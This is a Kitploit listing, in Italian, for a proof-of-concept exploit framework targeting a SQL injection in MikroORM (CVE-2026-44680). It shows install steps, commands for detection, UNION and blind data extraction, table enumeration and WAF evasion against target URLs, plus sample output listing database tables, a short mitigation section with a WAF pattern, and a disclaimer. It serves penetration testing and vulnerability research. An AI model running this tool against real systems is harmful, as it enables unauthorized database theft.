Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — Strumento PoC per CVE-2026-44680 che interessa MikroORM ≤7.0.13. Sfrutta l'iniezione del percorso JSON per estrarre il contenuto del database tramite attacchi basati su UNION. Include rilevamento delle vulnerabilità, estrazione automatica dei dati, enumerazione delle tabelle e supporto per l'iniezione cieca. Comprende l'integrazione con il proxy di Burp Suite e tecniche di evasione WAF. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework
Frameworks per Penetration TestingScanner di VulnerabilitàAnalisi del CodiceExploitSicurezza WebSicurezza dei Database
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

Vedi Repository
1201 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Strumento PoC per CVE-2026-44680 che interessa MikroORM ≤7.0.13. Sfrutta l'iniezione del percorso JSON per estrarre il contenuto del database tramite attacchi basati su UNION. Include rilevamento delle vulnerabilità, estrazione automatica dei dati, enumerazione delle tabelle e supporto per l'iniezione cieca. Comprende l'integrazione con il proxy di Burp Suite e tecniche di evasione WAF.

Condividi

CVE-2026-44680 - Framework di Exploit per SQL Injection in MikroORM

Python Version License Status CVSS

Strumento Proof-of-Concept professionale per ricercatori di sicurezza


🔍 Panoramica

CVE-2026-44680 è una vulnerabilità critica di SQL injection che colpisce MikroORM, un popolare ORM TypeScript per Node.js. Questo framework di exploit fornisce a ricercatori di sicurezza e penetration tester uno strumento professionale per rilevare e sfruttare la vulnerabilità.

Autore: Sudeepa Wanigarathna
Versione: 1.0.0
Classificazione: Strumento professionale per la ricerca sulla sicurezza


🚨 Dettagli della Vulnerabilità

AttributoValore
ID CVECVE-2026-44680
Punteggio CVSS7.6 (Alto)
Vettore di attaccoRete
Complessità dell'attaccoBassa
Privilegi richiestiBassi

Versioni interessate

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

Causa principale

MikroORM non riesce a eseguire correttamente l'escape delle chiavi di percorso JSON controllate a runtime durante la costruzione delle query JSON_EXTRACT. Gli attaccanti possono fuoriuscire dal contesto del percorso JSON e iniettare codice SQL arbitrario.


✨ Funzionalità

FunzionalitàDescrizioneStato
Rilevamento delle vulnerabilitàRilevamento basato sul tempo e sugli errori✅
Estrazione del databaseVersione, database, utente, hostname✅
Enumerazione delle tabelleScoperta automatica di tutte le tabelle✅
Iniezione basata su UNIONEstrazione dei dati tramite UNION SELECT✅
Iniezione ciecaEstrazione di caratteri basata su valori booleani✅
Supporto proxyBurp Suite / proxy di intercettazione✅
Generazione di reportReport TXT professionali✅
Evasione WAFTecniche avanzate di offuscamento✅

📦 Installazione

Prerequisiti

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

Passaggi di installazione

Passaggio 1: Clonare il repository

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

Passaggio 2: Installare le dipendenze

root@kitploit:~
# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

Passaggio 3: Verificare l'installazione

root@kitploit:~
python exploit.py --help

requirements.txt

root@kitploit:~
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 Avvio rapido

Utilizzo di base

root@kitploit:~
# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 Guida all'utilizzo

Opzioni del comando

FlagDescrizionePredefinito
-u, --urlURL di destinazione (obbligatorio)-
-e, --endpointEndpoint API/api/users/search
-p, --proxyProxy HTTPNessuno
-v, --verboseOutput dettagliatoFalse
--detectRileva solo la vulnerabilitàFalse
--extractEstrae le informazioni del databaseFalse
--enumerateEnumera le tabelleFalse
--blindModalità di iniezione ciecaFalse

Comandi di esempio

1. Sfruttamento completo

root@kitploit:~
python exploit.py -u http://192.168.1.100:3000

2. Endpoint personalizzato

root@kitploit:~
python exploit.py -u http://target.com -e /api/v2/users/query

3. Con proxy (Burp Suite)

root@kitploit:~
python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. Debug dettagliato

root@kitploit:~
python exploit.py -u http://target.com -v --extract

5. Iniezione cieca

root@kitploit:~
python exploit.py -u http://target.com --blind

6. Solo rilevamento

root@kitploit:~
python exploit.py -u http://target.com --detect

7. Estrazione delle informazioni del database

root@kitploit:~
python exploit.py -u http://target.com --extract

8. Enumerazione delle tabelle

root@kitploit:~
python exploit.py -u http://target.com --enumerate

📊 Esempi di output

Output della console

root@kitploit:~
============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

File generati

root@kitploit:~
exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ Mitigazione

Azioni immediate

1. Aggiornare MikroORM

root@kitploit:~
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. Validazione degli input

root@kitploit:~
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. Regole WAF

root@kitploit:~
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. Hardening del database

  • Applicare il principio del minimo privilegio
  • Utilizzare utenti di database separati
  • Implementare la registrazione delle query
  • Abilitare il rilevamento delle SQL injection

⚠️ Disclaimer

IMPORTANTE: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi didattici.

Avviso legale

  • ✅ È necessario disporre di un'autorizzazione esplicita prima di testare qualsiasi sistema
  • ✅ Sei responsabile di qualsiasi danno causato da un uso improprio
  • ✅ Usa lo strumento eticamente e segnala le vulnerabilità in modo responsabile

Linee guida per l'uso etico

  1. Autorizzazione: Ottieni il permesso scritto dal proprietario del sistema
  2. Segnalazione: Segnala i risultati ai fornitori interessati in modo responsabile
  3. Riservatezza: Non divulgare le vulnerabilità finché non sono state corrette
  4. Limiti: Rimanere nell'ambito dei test autorizzati

📄 Licenza

Questo progetto è distribuito sotto la licenza MIT.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

📚 Riferimenti

  • Dettagli CVE-2026-44680
  • Avviso di sicurezza MikroORM
  • Prevenzione delle SQL Injection di OWASP

Realizzato con ❤️ per la community di ricerca sulla sicurezza

Segnala un bug • Richiedi una funzionalità • Assegna una stella su GitHub

Scarica lo strumento